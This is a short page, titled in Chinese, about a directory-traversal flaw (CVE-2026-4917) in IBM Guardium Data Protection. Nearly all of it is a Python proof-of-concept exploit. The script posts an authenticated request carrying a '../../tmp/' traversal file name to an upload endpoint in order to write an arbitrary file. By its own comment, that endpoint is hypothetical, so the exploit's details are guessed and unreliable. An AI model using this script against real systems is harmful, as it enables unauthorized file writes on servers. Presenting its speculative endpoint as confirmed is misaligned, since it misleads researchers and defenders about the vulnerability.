CVE-2026-4917 IBM Guardium 目录遍历漏洞

# PoC for CVE-2026-4917: IBM Guardium Data Protection Arbitrary File Write # This script demonstrates the directory traversal vulnerability. # Note: Admin privileges are required (PR:H). import requests def exploit(target_ip, admin_user, admin_pass): # The vulnerable endpoint (hypothetical based on description) url = f"https://{target_ip}/api/upload_file" # The payload containing directory traversal sequences # Attempting to write to a sensitive system location traversal_payload = "../../tmp/malicious_payload.txt" data = { "file": traversal_payload, "content": "This is an arbitrary file write exploit." } try: response = requests.post(url, data=data, auth=(admin_user, admin_pass), verify=False) if response.status_code == 200: print("[+] Exploit successful! File written.") else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") # Usage # exploit("<TARGET_IP>", "admin", "password")